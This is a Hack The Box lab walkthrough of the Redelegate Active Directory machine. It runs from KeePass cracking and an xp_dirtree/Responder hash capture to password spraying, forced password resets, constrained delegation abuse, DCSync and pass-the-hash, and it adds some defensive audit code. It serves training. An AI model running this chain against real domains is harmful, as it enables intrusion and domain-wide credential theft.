HTB-Redelegate

Redelegate Hack The Box - Complete Walkthrough & Writeup

Introduction

Welcome to my complete walkthrough of Redelegate from Hack The Box - VulnLab! This challenging Active Directory machine tests your understanding of Kerberos delegation attacks, password cracking, and MSSQL enumeration techniques. In this detailed writeup, I’ll walk you through the entire exploitation chain from anonymous FTP access to domain administrator privileges.

Tools Used: Nmap, Impacket, Hashcat, Keepass2john, BloodHound, NetExec, Evil-WinRM, BloodyAD, Responder

Difficulty: Hard

Key Techniques: Anonymous FTP enumeration, KeePass database cracking, MSSQL authentication relay, Active Directory enumeration, Kerberos Constrained Delegation abuse, DCSync attack


Enumeration

Nmap Scan

Starting with our initial port scan, we discover numerous services running on the target:

PORT      STATE SERVICE       REASON          VERSION
21/tcp open ftp syn-ack ttl 127 Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 10-20-24 01:11AM 434 CyberAudit.txt
| 10-20-24 05:14AM 2622 Shared.kdbx
|_10-20-24 01:26AM 580 TrainingAgenda.txt
53/tcp open domain? syn-ack ttl 127
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-10-21 06:25:37Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: redelegate.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
1433/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 2019
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: redelegate.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49932/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 2019

The key findings from this scan are:

  • FTP (Port 21): Anonymous login enabled with interesting files
  • MSSQL (Port 1433): SQL Server 2019 running
  • Kerberos (Port 88): Domain controller identified
  • LDAP (Ports 389/3268): Domain name redelegate.vl

FTP Anonymous Access

Since anonymous FTP login is enabled, let’s connect and retrieve the available files:

FTP Anonymous Login

The CyberAudit.txt file reveals crucial information about recent security findings:

OCTOBER 2024 AUDIT FINDINGS

[!] CyberSecurity Audit findings:

1) Weak User Passwords
2) Excessive Privilege assigned to users
3) Unused Active Directory objects
4) Dangerous Active Directory ACLs

[*] Remediation steps:

1) Prompt users to change their passwords: DONE
2) Check privileges for all users and remove high privileges: DONE
3) Remove unused objects in the domain: IN PROGRESS
4) Recheck ACLs: IN PROGRESS

The TrainingAgenda.txt file provides an important hint about password formats:

EMPLOYEE CYBER AWARENESS TRAINING AGENDA (OCTOBER 2024)

Friday 4th October | 14.30 - 16.30 - 53 attendees
"Don't take the bait" - How to better understand phishing emails and what to do when you see one


Friday 11th October | 15.30 - 17.30 - 61 attendees
"Social Media and their dangers" - What happens to what you post online?


Friday 18th October | 11.30 - 13.30 - 7 attendees
"Weak Passwords" - Why "SeasonYear!" is not a good password


Friday 25th October | 9.30 - 12.30 - 29 attendees
"What now?" - Consequences of a cyber attack and how to mitigate them

This training agenda explicitly mentions the weak password format: SeasonYear!

Finally, we discover a Shared.kdbx KeePass database that’s password protected.


Cracking the KeePass Database

Extracting the Hash

First, let’s extract the hash from the KeePass database:

keepass2john Shared.kdbx

Initial Cracking Attempt

I attempted to crack it using the rockyou.txt wordlist:

hashcat -m 29700 hash.txt /usr/share/wordlists/rockyou.txt

However, this doesn’t crack within a reasonable timeframe.

Generating Custom Wordlist

Based on the hint from TrainingAgenda.txt, I created a custom wordlist with the SeasonYear! format:

#!/usr/bin/env python3
# gen_seasons_with_fall.py
# Writes every Season + Year + "!" combination for 2010-2030 to a wordlist file.

seasons = ["Spring", "Summer", "Autumn", "Fall", "Winter"]
symbol = "!"
start_year = 2010
end_year = 2030

out_path = "season_years.txt"

with open(out_path, "w", encoding="utf-8") as f:
    for year in range(start_year, end_year + 1):
        for season in seasons:
            f.write(f"{season}{year}{symbol}\n")

print(f"Wrote {(end_year - start_year + 1) * len(seasons)} lines to {out_path}")

Now crack the hash using our custom wordlist:

hashcat Shared.kdbx.hash season_years.txt --user -m 13400

Success! The password is: Fall2024!

Note: If you have issues cracking, the .kdbx file might be corrupted. Before downloading with get, type binary in your FTP client to ensure proper transfer.
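The flip side of the wordlist above is the password filter that should have rejected these values at password-change time. The following is an added example, not code from the writeup: it catches the SeasonYear! pattern the training agenda warns about, including the obvious variants (either case, two-digit years, a few leetspeak substitutions, a separator, a trailing run of symbols) that a generated wordlist would also cover. The year bounds and the leet table are assumptions made for this example.

```python
#!/usr/bin/env python3
"""Reject SeasonYear!-style passwords before they reach the directory.

Added example (not part of the original writeup).  Everything here is a
plain string check so it can be run stand-alone or dropped into a
password-change hook.
"""
import re
from typing import List, Optional

SEASONS = ("spring", "summer", "autumn", "fall", "winter")

# Minimal leetspeak normalisation: only substitutions that can produce a
# season name (assumption: this list is enough for the variants we care about).
LEET = str.maketrans({"@": "a", "4": "a", "$": "s", "5": "s", "3": "e", "1": "i"})

# Assumed plausible year window: four-digit years from 1990 up to a few years
# ahead; two-digit years are read as 20xx.
MIN_YEAR = 1990


def season_year_pattern(password: str, current_year: int = 2024) -> Optional[str]:
    """Return a reason string if the password is Season + Year (+ symbols), else None."""
    # Drop a trailing run of symbols such as "!" or "!!#".
    body = re.sub(r"[^A-Za-z0-9]+$", "", password)
    for digits in (4, 2):
        if len(body) <= digits:
            continue
        head, year = body[:-digits], body[-digits:]
        if not year.isdigit():
            continue
        # Allow a separator between season and year ("Fall-2024", "spring_23").
        head = re.sub(r"[^A-Za-z0-9@$]", "", head)
        season = head.lower().translate(LEET)
        if season not in SEASONS:
            continue
        y = int(year) if digits == 4 else 2000 + int(year)
        if MIN_YEAR <= y <= current_year + 5:
            return f"season '{season}' followed by year {y}"
    return None


def reject_weak(candidates: List[str], current_year: int = 2024) -> List[str]:
    """Return the subset of candidate passwords the filter would reject."""
    return [p for p in candidates if season_year_pattern(p, current_year)]


if __name__ == "__main__":
    # Constructed sample inputs for a quick demonstration.
    for pw in ["Fall2024!", "Summer24", "W1nter2022#", "spring-2023", "Correct-Horse-99", "Tr0ub4dor&3"]:
        print(f"{pw:18} -> {season_year_pattern(pw) or 'ok'}")
```

The check deliberately looks at the whole structure of the password rather than at a blocklist of literal strings: a user who is told "Fall2024!" is banned will try "fall2024!!" or "Autumn24" next, and a structural check catches those without regenerating the list every season.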

KeePass Database Contents

Opening the database reveals multiple credentials:

FS01 Admin | Administrator:Spdv41gg4BlBgSYIW1gF
FTP | FTPUser:SguPZBKdRyxWzvXRWy6U
SQL Guest Access | SQLGuest:zDPBpaF4FywlqIv11vii
WEB01 | WordPress Panel:cn4KOEgsHqvKXPjEnSD9
KeyFob Combination | 22331144
Payrol App | Payroll:cVkqz4bCM7kJRcd62vqi5X
Timesheet Manager | Timesheet:hMFS4I0Kj8Rcd62vqi5X

MSSQL Exploitation

Authenticating to MSSQL

From our Nmap scan, we know MSSQL is running. Let’s use the SQLGuest credentials:

impacket-mssqlclient redelegate/SQLGuest:'zDPBpaF4FywlqIv11vii'@dc.redelegate.vl

MSSQL Authentication

Hash Relay Attack

The SQLGuest user has permission to execute xp_dirtree, which we can abuse to relay the hash of the sql_svc account back to ourselves.

Start Responder in one terminal:

sudo responder -I tun0

Then execute the following in MSSQL:

xp_dirtree \\(Your ip)\shared

XP_Dirtree Hash Capture

Unfortunately, the captured hash doesn’t crack, so we need to try a different approach.


Domain User Enumeration

Method 1: Metasploit Module

You can use the Metasploit module auxiliary/admin/mssql/mssql_enum_domain_accounts to enumerate domain users.

Method 2: Manual Enumeration

However, during real penetration tests, you might not have access to these tools. Here’s the manual method:

Step 1: Select the domain:

SQL (SQLGuest  guest@master)> select DEFAULT_DOMAIN() as mydomain;

Step 2: Get the domain SID:

SQL (SQLGuest  guest@master)> select SUSER_SID('REDELEGATE\Domain Admins')

Step 3: Remove the trailing 00020000 from the returned value. Those four bytes are the little-endian encoding of RID 512, the Domain Admins group; what remains is the domain SID prefix that every account in the domain shares.

Step 4: Use the following script to brute force user accounts:

#!/bin/bash

# Domain SID prefix from step 3 (binary form, without the trailing RID)
SID_BASE="010500000000000515000000a185deefb22433798d8e847a"

for RID in {1000..1500}; do
    # Append the candidate RID as a 32-bit little-endian value
    HEX_RID=$(python3 -c "import struct; print(struct.pack('<I', ${RID}).hex())")
    SID="${SID_BASE}${HEX_RID}"
    # Ask SQL Server to resolve the binary SID back to a name
    RES=$(impacket-mssqlclient SQLGuest:zDPBpaF4FywlqIv11vii@dc.redelegate.vl -file <( echo "select SUSER_SNAME(0x${SID});") 2>&1 | sed -n '/^----/{n;p;}')
    echo -n $'\r'"${RID}: ${RES}"
    # Keep the line only when the RID resolved to an account
    [[ "$(echo "$RES" | xargs)" != "NULL" ]] && echo
done

(Credit to 0xdf and his Discord community for this elegant script)
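Steps 2 to 4 depend on the binary layout of a Windows SID, which is worth seeing end to end. The following is an added example, not code from the writeup or from 0xdf's script: it decodes a binary SID into its S-1-5-... form and back, splits off the RID, and shows why stripping 00020000 from the SUSER_SID() result leaves the domain SID. The only value taken from the writeup is SID_BASE; the well-known SID S-1-5-32-544 (BUILTIN\Administrators) is used as a second check.

```python
#!/usr/bin/env python3
"""Encode and decode Windows security identifiers (SIDs).

Added example, not part of the original writeup.  Binary SID layout
(MS-DTYP 2.4.2.2): revision (1 byte), sub-authority count (1 byte),
identifier authority (6 bytes, big-endian), then count x 32-bit
little-endian sub-authorities.  The last sub-authority of an account
or group SID is its RID.
"""
import struct
from typing import Tuple

# Prefix from the writeup: header plus the three domain sub-authorities, no RID.
SID_BASE = "010500000000000515000000a185deefb22433798d8e847a"
DOMAIN_ADMINS_RID = 512  # 0x200 -> little-endian bytes 00 02 00 00


def sid_from_bytes(raw: bytes) -> str:
    """Decode a binary SID into its S-1-5-... string form."""
    if len(raw) < 8:
        raise ValueError("SID too short")
    revision, count = raw[0], raw[1]
    authority = int.from_bytes(raw[2:8], "big")
    if len(raw) != 8 + 4 * count:
        raise ValueError(f"header declares {count} sub-authorities, "
                         f"but {(len(raw) - 8) // 4} are present")
    subs = struct.unpack(f"<{count}I", raw[8:])
    return "S-" + "-".join(str(x) for x in (revision, authority, *subs))


def sid_to_bytes(sid: str) -> bytes:
    """Encode an S-1-5-... string back into its binary form."""
    parts = sid.split("-")
    if len(parts) < 3 or parts[0] != "S":
        raise ValueError("malformed SID")
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(x) for x in parts[3:]]
    return (bytes([revision, len(subs)]) + authority.to_bytes(6, "big")
            + struct.pack(f"<{len(subs)}I", *subs))


def split_rid(sid: str) -> Tuple[str, int]:
    """Split a principal SID into (domain SID, RID)."""
    head, _, rid = sid.rpartition("-")
    return head, int(rid)


def domain_sid_from_base(base_hex: str, rid: int = DOMAIN_ADMINS_RID) -> str:
    """Complete the writeup's base with a RID, decode it, and drop the RID again.

    The base alone declares five sub-authorities but carries only four, so
    it is not a valid SID until a four-byte RID is appended.
    """
    full = sid_from_bytes(bytes.fromhex(base_hex) + struct.pack("<I", rid))
    return split_rid(full)[0]


if __name__ == "__main__":
    full = sid_from_bytes(bytes.fromhex(SID_BASE + "00020000"))
    print("Domain Admins SID:", full)
    print("Domain SID:       ", split_rid(full)[0])
    print("Round trip OK:    ", sid_to_bytes(full).hex() == SID_BASE + "00020000")
```

On the defensive side this is also why SUSER_SNAME() calls in bulk are a useful detection signal: a guest login resolving hundreds of sequential RIDs through a single linked-domain function is not normal application behaviour, and SQL Server audit can record exactly that.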

User Enumeration via MSSQL

Discovered Users

Christine.Flanders
Marie.Curie
Helen.Frost
Michael.Pontiac
Mallory.Roberts
James.Dinkleberg
Ryan.Cooper
sql_svc

Password Spraying

Now that we have a list of usernames and potential passwords from the KeePass database, let’s perform password spraying:

netexec smb 10.129.234.50 -u usernames.txt -p passwords.txt

Success! We find valid credentials:

[+] redelegate.vl\Marie.Curie:Fall2024!

This account also has LDAP authentication privileges, perfect for BloodHound enumeration.


Active Directory Enumeration with BloodHound

Let’s dump LDAP data and ingest it into BloodHound:

netexec ldap 10.129.234.50 -u Marie.Curie -p 'Fall2024!' --bloodhound --dns-server 10.129.234.50 -c ALL --dns-tcp

BloodHound Analysis

After analyzing the data in BloodHound, we discover multiple attack paths:

Attack Paths in BloodHound

We have ForceChangePassword privileges on several users, including:

  • sql_svc account
  • Helen.Frost (who has GenericAll over FS01$)

All Permissions in BloodHound


Lateral Movement to Helen.Frost

Let’s pursue the Helen.Frost path since she has powerful permissions. First, we’ll force a password change:

bloodyAD -H 10.129.234.50 -d "REDELEGATE.VL" -u "Marie.Curie" -p 'Fall2024!' set password "Helen.Frost" 'Fall2024!'

Now we can authenticate via WinRM:

WinRM Access

Whoami as Helen.Frost

Identifying Privileges

Helen.Frost holds SeEnableDelegationPrivilege, the user right required to mark accounts as trusted for delegation, which means we can abuse Kerberos delegation mechanisms.

There are three types of Kerberos delegation:

  • Unconstrained Delegation (KUD): A service can impersonate users on any other service
  • Constrained Delegation (KCD): A service can impersonate users on a set of specific services
  • Resource-Based Constrained Delegation (RBCD): A set of services can impersonate users on a specific service

Reference: https://www.thehacker.recipes/ad/movement/kerberos/delegations/

I initially explored RBCD, but none of our accounts can add machine accounts (MachineAccountQuota is 0).


Privilege Escalation - Administrator

Constrained Delegation Abuse

Since Helen.Frost has GenericAll over FS01$, we can configure Constrained Delegation on the FS01 machine account.

First, connect via PowerShell using Evil-WinRM, then execute:

Set-ADAccountControl -Identity "FS01$" -TrustedToAuthForDelegation $True
Set-ADObject -Identity "CN=FS01,CN=COMPUTERS,DC=REDELEGATE,DC=VL" -Add @{"msDS-AllowedToDelegateTo"="ldap/dc.redelegate.vl"}

What we’ve done:

  1. Set the TrustedToAuthForDelegation flag on FS01$, which enables protocol transition (S4U2Self): FS01$ can now obtain a ticket for any user without that user ever authenticating to it
  2. Added ldap/dc.redelegate.vl to the msDS-AllowedToDelegateTo attribute of FS01$, the list of services to which FS01$ may forward those tickets (S4U2Proxy)

FS01$ can now obtain service tickets for the LDAP service on the DC on behalf of any user who is not marked as sensitive for delegation.
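The three delegation types listed earlier and the two Set-AD* commands above map onto a handful of directory attributes, so the state FS01$ is left in is straightforward to audit for. The following is an added example, not code from the writeup or from any tool it uses: it scores accounts by userAccountControl flags and msDS-AllowedToDelegateTo targets, and flags the FS01$ configuration as critical. The records are constructed for the example (the DC hostname and FS01 come from the lab; WEB01$, fs02 and the administrator's flags are made up), and the set of sensitive service classes is an assumption.

```python
#!/usr/bin/env python3
"""Audit Active Directory accounts for risky Kerberos delegation settings.

Added example, not part of the original writeup.  Input records mimic the
attributes an LDAP query returns; the checks are:
  - KUD: UF_TRUSTED_FOR_DELEGATION on anything that is not a DC
  - KCD: msDS-AllowedToDelegateTo entries, rated by target and by whether
         protocol transition (UF_TRUSTED_TO_AUTH_FOR_DELEGATION) is set
"""
from dataclasses import dataclass
from typing import Dict, List

# userAccountControl flag bits (ADS_USER_FLAG_ENUM)
UF_SERVER_TRUST_ACCOUNT = 0x2000               # domain controller computer account
UF_TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation (KUD)
UF_NOT_DELEGATED = 0x100000                    # "account is sensitive and cannot be delegated"
UF_TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # KCD with protocol transition

# Assumption: the domain's DC list; the lab has a single DC.
DOMAIN_CONTROLLERS = {"dc.redelegate.vl"}
# Assumption: service classes on a DC that expose directory data or the host itself.
SENSITIVE_SERVICES = {"ldap", "cifs", "host", "http", "rpcss", "wsman"}


@dataclass
class Finding:
    account: str
    severity: str
    reason: str


def audit_delegation(records: List[Dict]) -> List[Finding]:
    """Return one finding per risky delegation setting, most severe first."""
    findings: List[Finding] = []
    for rec in records:
        name = rec["sAMAccountName"]
        uac = int(rec.get("userAccountControl", 0))
        is_dc = bool(uac & UF_SERVER_TRUST_ACCOUNT)
        transition = bool(uac & UF_TRUSTED_TO_AUTH_FOR_DELEGATION)

        # Unconstrained delegation is expected on DCs and a serious exposure elsewhere.
        if uac & UF_TRUSTED_FOR_DELEGATION and not is_dc:
            findings.append(Finding(name, "HIGH", "unconstrained delegation on a non-DC account"))

        # Constrained delegation: rate each target SPN.
        for spn in rec.get("msDS-AllowedToDelegateTo", []):
            service, _, host = spn.partition("/")
            host = host.split(":", 1)[0].lower()
            to_dc = host in DOMAIN_CONTROLLERS and service.lower() in SENSITIVE_SERVICES
            if to_dc and transition:
                severity = "CRITICAL"  # any unprotected user can be impersonated against the DC
            elif to_dc or transition:
                severity = "HIGH"
            else:
                severity = "MEDIUM"
            reason = f"constrained delegation to {spn}"
            if transition:
                reason += " with protocol transition"
            findings.append(Finding(name, severity, reason))

    order = {"CRITICAL": 0, "HIGH": 1, "MEDIUM": 2}
    return sorted(findings, key=lambda f: order[f.severity])


def protected_accounts(records: List[Dict]) -> List[str]:
    """Accounts marked sensitive, which S4U2Proxy cannot impersonate."""
    return [r["sAMAccountName"] for r in records
            if int(r.get("userAccountControl", 0)) & UF_NOT_DELEGATED]


# Constructed sample: FS01$ as left by the two Set-AD* commands, the DC,
# a made-up web server with ordinary KCD, a sensitive admin, a plain workstation.
SAMPLE_RECORDS = [
    {"sAMAccountName": "FS01$", "userAccountControl": 0x1000 | UF_TRUSTED_TO_AUTH_FOR_DELEGATION,
     "msDS-AllowedToDelegateTo": ["ldap/dc.redelegate.vl"]},
    {"sAMAccountName": "DC$", "userAccountControl": UF_SERVER_TRUST_ACCOUNT | UF_TRUSTED_FOR_DELEGATION},
    {"sAMAccountName": "WEB01$", "userAccountControl": 0x1000,
     "msDS-AllowedToDelegateTo": ["cifs/fs02.redelegate.vl"]},
    {"sAMAccountName": "Administrator", "userAccountControl": 0x200 | UF_NOT_DELEGATED},
    {"sAMAccountName": "WS01$", "userAccountControl": 0x1000},
]

if __name__ == "__main__":
    for f in audit_delegation(SAMPLE_RECORDS):
        print(f"{f.severity:8} {f.account:15} {f.reason}")
    print("protected from delegation:", ", ".join(protected_accounts(SAMPLE_RECORDS)))
```

Two mitigations follow directly from the checks: privileged accounts should carry the sensitive flag or sit in Protected Users so S4U2Proxy cannot act as them, and SeEnableDelegationPrivilege should be held only by domain administrators. Changes to these attributes are also logged by the DC (event 4742 for computer-account changes and 5136 for directory object modifications when auditing is enabled), which is where the two commands above would show up.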

Changing FS01$ Password

Next, we need to change the password of the FS01 machine account so we can use it to request service tickets:

bloodyAD -H 10.129.234.50 -d "REDELEGATE.VL" -u "Helen.frost" -p 'Fall2024!' set password 'FS01$' 'Fall2024!'

Requesting Service Ticket with Impersonation

Now we can request a service ticket (ST) for ldap/dc.redelegate.vl while impersonating the domain controller’s own computer account:

impacket-getST 'redelegate.vl/FS01$:Fall2024!' -spn ldap/dc.redelegate.vl -impersonate dc

DCSync Attack

Load the ticket and execute secretsdump to perform a DCSync attack:

KRB5CCNAME=dc.ccache impacket-secretsdump -k -no-pass dc.redelegate.vl

Administrator Access

Finally, use the Administrator hash to authenticate via WinRM and retrieve the root flag:

evil-winrm -i dc.redelegate.vl -u Administrator -H ec1HASHHASHHASH:)

Conclusion

Redelegate was an excellent machine for practicing Active Directory attacks, particularly Kerberos delegation abuse. The attack chain involved:

  1. Anonymous FTP enumeration
  2. KeePass database cracking with custom wordlists
  3. MSSQL authentication and user enumeration
  4. Password spraying to gain initial access
  5. BloodHound analysis to identify attack paths
  6. Abusing Constrained Delegation to achieve domain compromise

Key Takeaways:

  • Always enumerate thoroughly - the training agenda hint was crucial
  • Custom wordlists are often more effective than generic ones
  • BloodHound is invaluable for identifying complex AD attack paths
  • Understanding Kerberos delegation is essential for advanced AD exploitation